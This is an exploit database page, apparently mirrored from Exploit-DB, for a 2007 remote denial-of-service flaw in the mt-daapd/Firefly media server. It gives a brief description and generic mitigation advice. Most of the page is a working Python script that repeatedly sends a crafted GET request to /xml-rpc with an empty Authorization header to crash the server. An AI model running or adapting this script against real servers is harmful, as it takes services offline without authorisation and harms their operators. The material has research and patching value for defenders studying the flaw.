header-logo
Suggest Exploit
vendor:
mt-dappd/Firefly media server
by:
nnp
5.5
CVSS
MEDIUM
Denial of Service
CWE
Product Name: mt-dappd/Firefly media server
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

mt-dappd/Firefly media server remote DoS

This exploit allows an attacker to remotely crash the mt-dappd/Firefly media server. The attacker can send a specially crafted HTTP GET request to the server, causing it to crash and become unresponsive. This vulnerability was discovered by nnp and reported on the website unprotectedhex.com.

Mitigation:

There is no specific mitigation mentioned in the code. However, to protect against this vulnerability, users are advised to keep their mt-dappd/Firefly media server up to date with the latest patches and security updates. Additionally, configuring proper access controls and firewall rules can help prevent unauthorized access to the server.
Source

Exploit-DB raw data:

#!C:\python25\python25.exe

"""
Advisory : [UPH-07-02]
mt-dappd/Firefly media server remote DoS
Discovered by nnp
http://www.unprotectedhex.com
"""

import sys
import socket
import time

if len(sys.argv) != 3:
    sys.exit(-1)

kill_msg = """GET /xml-rpc?method=stats HTTP/1.1\r\n 
Authorization:\r\n\r\n"""

host = sys.argv[1]
port = sys.argv[2]

print '[+] Host : ' + host
print '[+] Port : ' + port

print "[+] Sending "
print kill_msg

ctr = 1
while 1:
    print '[+] Ctr : ' + str(ctr)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, int(port)))
    s.send(kill_msg)
    s.close()
    ctr += 1

# milw0rm.com [2007-11-02]

Navigation

Suggest Exploit

Services By CQR